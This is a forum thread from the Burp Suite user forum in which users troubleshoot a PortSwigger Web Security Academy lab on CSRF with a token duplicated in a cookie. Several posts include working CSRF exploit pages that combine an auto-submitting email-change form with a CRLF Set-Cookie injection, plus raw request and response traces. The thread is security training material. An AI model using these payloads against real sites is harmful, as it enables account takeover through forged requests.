Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

CSRF LAB BROKEN - CSRF where token is duplicated in cookie

Hamza | Last updated: Jun 03, 2024 09:43AM UTC

Hey Team, When i try to deliver the exploit or test in my browser, this lab give me its invalid csrf although i have checked many times. Given is my payload. <html> <body> <h1>Hello World!</h1> <form action="https://0a25003904014c148065ad2c00ae00af.web-security-academy.net/my-account/change-email" method="post"> <input type="hidden" name="email" value="test5@test.ca"> <input type="hidden" name="csrf" value="hacked"> </form> <img src="https://0a25003904014c148065ad2c00ae00af.web-security-academy.net/?search=hat%0d%0aSet-Cookie:%20csrf=hacked%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Dominyque, PortSwigger Agent | Last updated: Jun 03, 2024 10:19AM UTC

Hi Hamza, As noted in the written solution, your CSRF token needs to have the value of 'fake' in order to solve this lab. If you make this change, are you then able to solve the lab?

Hamza | Last updated: Jun 04, 2024 07:38AM UTC

It still give me invalid csrf. <html> <body> <h1>Hello World!</h1> <form action="https://0a65006e0315a2d280db9958009100e4.web-security-academy.net/my-account/change-email" method="post"> <input type="hidden" name="email" value="newtest5@test.ca"> <input type="hidden" name="csrf" value="fake"> </form> <img src="https://0a65006e0315a2d280db9958009100e4.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Dominyque, PortSwigger Agent | Last updated: Jun 04, 2024 07:58AM UTC

Hi Hamza, I can confirm that the lab does solve with the given written solution. Have you changed the email address before storing and delivering the exploit to the victim? I was able to solve the lab with the following exploit: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a93003d0356b3b480ec9a0400340027.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="testy@test.com" /> <input type="hidden" name="csrf" value="fake" /> <input type="submit" value="Submit request" /> </form> <img src="https://0a93003d0356b3b480ec9a0400340027.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/> </body> </html>

P1N | Last updated: Jun 04, 2024 03:38PM UTC

those are also incorrectly processed by my lab, my payload in search does not read properly. Everything is fine in response, but the next request does not execute. request: GET /?search=test%0d%0aSet-Cookie:%20csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg%3b%20SameSite=None HTTP/2 response: HTTP/2 200 OK Set-Cookie: LastSearchTerm=test Set-Cookie: csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg; SameSite=Non; Secure; HttpOnly Set-Cookie: session=kQbiYYVQ0pKfGQeLoFbIWROUaSHoj72m; Secure; HttpOnly; SameSite=None Next request: POST /my-account/change-email HTTP/2 Host: 0a9800f803d7e13f80da94be00c10097.web-security-academy.net Cookie: csrfKey=H5AnPN2IfpZe7bJPos8rqbUcIviDZNlz; session=4VVtwDlnyFLYMXm1voOQaGhQM5dwoav3 csrf has not changed, why?

Ben, PortSwigger Agent | Last updated: Jun 05, 2024 08:46AM UTC

Hi both, To confirm, yes, there are some issues following the entirety of the written solution in conjunction with the embedded browser based on some restrictions with cookies. We believe that using a normal version of Chrome should still work at this point in time, however (this is obviously subject to change in the future).

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.